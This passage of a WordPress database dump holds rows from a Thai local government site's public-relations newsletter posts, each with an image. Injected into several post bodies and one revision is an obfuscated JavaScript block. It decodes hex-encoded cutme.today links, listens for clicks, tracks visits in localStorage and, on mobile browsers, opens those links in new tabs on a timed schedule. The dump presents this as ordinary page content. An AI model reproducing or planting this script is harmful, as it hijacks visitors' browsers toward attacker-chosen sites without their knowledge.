_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-32','','','2024-09-06 09:06:37','2024-09-06 02:06:37','',0,'http://pakhaeng.ssk.in.th/?p=1132',0,'post','',0),
(1133,1,'2024-09-06 09:04:51','2024-09-06 02:04:51','','32-2567','','inherit','','closed','','32-2567','','','2024-09-06 09:04:51','2024-09-06 02:04:51','',1132,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/32-2567.png',0,'attachment','image/png',0),
(1134,1,'2024-09-06 09:05:14','2024-09-06 02:05:14','<!-- wp:image {\"id\":1133,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/32-2567-724x1024.png\" alt=\"\" class=\"wp-image-1133\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','1132-revision-v1','','','2024-09-06 09:05:14','2024-09-06 02:05:14','',1132,'http://pakhaeng.ssk.in.th/?p=1134',0,'revision','',0),
(1136,1,'2024-09-12 21:34:44','2024-09-12 14:34:44','<!-- wp:image {\"id\":1137,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/33-2567-724x1024.png\" alt=\"\" class=\"wp-image-1137\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-33','','','2024-09-12 21:34:46','2024-09-12 14:34:46','',0,'http://pakhaeng.ssk.in.th/?p=1136',0,'post','',0),
(1137,1,'2024-09-12 21:34:28','2024-09-12 14:34:28','','33-2567','','inherit','','closed','','33-2567','','','2024-09-12 21:34:28','2024-09-12 14:34:28','',1136,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/33-2567.png',0,'attachment','image/png',0),
